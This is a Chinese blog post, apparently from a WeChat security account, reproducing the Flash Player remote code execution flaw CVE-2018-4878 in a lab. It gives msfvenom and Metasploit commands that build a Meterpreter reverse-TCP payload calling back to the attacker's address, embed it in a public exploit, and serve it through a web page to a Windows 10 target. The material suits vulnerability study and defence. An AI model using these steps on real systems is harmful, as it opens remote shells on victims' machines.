0x01 前言
该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。
0x02 环境
攻击机: kali 2018 (192.168.59.6
)
靶机: Windows 10 x64 (192.168.59.160
)
Web服务器: Windows 7 X64 (192.168.59.127
)
0x03 复现过程
-
我们先在kali生成一个python类型的shellcode
msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f python > /root/shellcode.txt
-
替换EXP里面的shellcode
-
使用cve-2018-4878.py生成文件,我这里用的是
Sublime Text 3
Ctrl+B运行python,会在本目录下生成两个文件index.html
,exploit.swf
-
然后把这两个文件放到Web服务器里面
-
在kali的MSF里面设置监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.59.6
msf exploit(handler) > set LPORT 6666
msf exploit(handler) > exploit -
然后使用靶机的win10 IE访问Web服务器的文件
index.html
最后
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的
本文始发于微信公众号(无害实验室sec):Flash RCE 漏洞(CVE-2018-4878)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论